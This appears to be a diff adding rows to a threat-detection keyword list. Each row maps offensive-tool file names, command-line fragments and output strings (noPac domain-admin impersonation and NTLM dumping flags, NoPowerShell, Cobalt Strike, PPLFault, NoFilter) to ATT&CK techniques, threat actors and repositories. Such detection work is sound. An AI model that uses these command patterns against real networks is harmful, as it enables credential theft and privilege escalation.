+"*nmap-reverse-lookup*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*no Mimik@tz - loaded successfully*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*no_session_payload.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*NoApiUser.exe*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" +"*noclient: failed to execute %s: %s*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*node stealer.js *","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*NoFault\NoFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*NoFilter.exe *","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*NoFilter-main.zip*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*nop_shellcode.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*noPac * -dc-ip * --impersonate *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*noPac.* -create-child*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -dc-host *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -dc-ip *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -domain-netbios*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -dump*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -hashes *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* --impersonate *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -just-dc-ntlm*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -just-dc-user *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -new-name *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -no-add *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -pwd-last-set*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -service-name *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -shell*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -shell-type *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -use-ldap*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.csproj*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"*noPac.csproj.AssemblyReference.cache*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"*noPac.py*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.sln*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"*NoPowerShell.cna*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.cna*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.Commands*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*nopowershell.exe*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.exe*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.sln*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell/*.cs*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell_trunk.zip*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell32.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell64.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*--no-promiscuous-mode*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*normal/randomized.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*northdata-get-company-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*noseyparker report --datastore *","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*noseyparker scan --datastore *","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*noseyparker summarize --datastore *","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*noseyparker-cli*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*noseyparker-main*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*noseyparker-v*-universal-macos*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*noseyparker-v*-x86_64-unknown-linux-gnu*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*Nosql-Exploitation-Framework*","offensive_tool_keyword","Nosql-Exploitation-Framework","A FrameWork For NoSQL Scanning and Exploitation Framework","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Frameworks","https://github.com/torque59/Nosql-Exploitation-Framework","1","1","N/A","N/A","6","594","158","2023-09-26T11:50:30Z","2013-12-26T17:46:11Z" 